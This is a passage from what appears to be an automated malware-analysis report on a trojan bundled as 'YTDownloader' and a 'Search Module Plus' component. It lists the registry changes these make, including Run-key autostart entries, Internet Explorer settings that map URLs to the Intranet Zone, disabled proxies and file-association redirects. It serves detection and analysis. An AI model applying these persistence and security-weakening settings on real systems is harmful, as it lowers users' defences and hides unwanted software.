"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in the system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process setup.exe:2860 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"ExeLocation" = "%Program Files%\YTDownloader\Converter.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\AniGIFPpg.AniGIFPpg]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "IAniGIF"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCR\AniGIFCtrl.AniGIF\CurVer]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"intl" = "http://www.fileextensionpro.com/redir.aspx?s=&LangID=x&Ext=%s"

[HKLM\SOFTWARE\YTDownloader]
"ExeLocation" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"UninstallString" = "%Program Files%\YTDownloader\YTDUninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application" = "http://www.fileextensionpro.com/redir.aspx?s=&LangID=x&Ext=%s"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"FFUseConverter" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"Publisher" = "YTDownloader"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ToolboxBitmap32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx, 1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\AniGIFPpg2.AniGIFPpg2.1]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\AniGIFCtrl.AniGIF]
"(Default)" = "Animation GIF Control"

[HKCR\AniGIFPpg.AniGIFPpg.1]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"Version" = "1.5"
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\AniGIFPpg.AniGIFPpg.1\CLSID]
"(Default)" = "{6DC82D15-92F2-11D1-A255-00A0C932C7DF}"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\0\win32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 78 E1 EC F4 88 67 E6 E4 E2 59 93 7B 49 72 0C"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKLM\SOFTWARE\YTDownloader]
"Version" = "1.0.11487.1216"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"Install" = "%Program Files%\YTDownloader\"

[HKCR\AniGIFPpg2.AniGIFPpg2.1\CLSID]
"(Default)" = "{61AB12E1-A5FF-11D1-B2E9-444553540000}"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb\0]
"(Default)" = "&Properties,0,2"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"Version" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AniGIFPpg.AniGIFPpg\CurVer]
"(Default)" = "AniGIFPpg.AniGIFPpg.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"XMLLookup" = "http://www.fileextensionpro.com/redir.aspx?s=&LangID=x&Ext=%s&"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\FLAGS]
"(Default)" = "2"

[HKCU\Software\YTDownloader]
"Version" = "1.0.11487.1216"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayIcon" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"net.exe" = "Net Command"

[HKCR\AniGIFPpg2.AniGIFPpg2\CurVer]
"(Default)" = "AniGIFPpg2.AniGIFPpg2.1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus\1]
"(Default)" = "131473"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\AniGIFPpg2.AniGIFPpg2]
"(Default)" = "AniGIFPpg2 Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\AniGIFCtrl.AniGIF\CLSID]
"(Default)" = "{82351441-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}]
"(Default)" = "IAniGIFEvents"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayName" = "YTDownloader"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ProgID]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}]
"(Default)" = "AniGIFPpg2 Class"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Version]
"(Default)" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb]
"(Default)" = ""

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}]
"(Default)" = "AniGIFPpg Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCR\AniGIFCtrl.AniGIF\Insertable]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\YTDownloader.exe]
"(Default)" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\HELPDIR]
"(Default)" = "%Program Files%\YTDownloader\"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Programmable]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"MaxConnectionsPerServer"
"MaxConnectionsPer1_0Server"

The process YTDownloader.exe:2056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\YTDownloader]
"UserId" = "{C41FEF8F-ADBB-4F68-BEA7-CDD74FDBA6CA}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 42 F5 11 75 FC E4 AF A6 B9 C3 E7 91 16 09 E8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\YTDownloader]
"UserId" = "{C41FEF8F-ADBB-4F68-BEA7-CDD74FDBA6CA}"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process tcpsvcs.exe:2536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Plus" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\SearchModulePlus\Info]
"ExeLocation" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"DisplayIcon" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"Aff" = "F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"Version" = "2.3.12.1634"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"DisplayName" = "Search Module Plus"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"UserId" = "1844237615-1960408961-1801674531"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"(Default)" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"Publisher" = "Goobzo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 9C DE 34 2B 9D B0 BC 36 50 E6 30 DB 3C E2 72"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"UninstallString" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Install" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process tcpsvcs.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
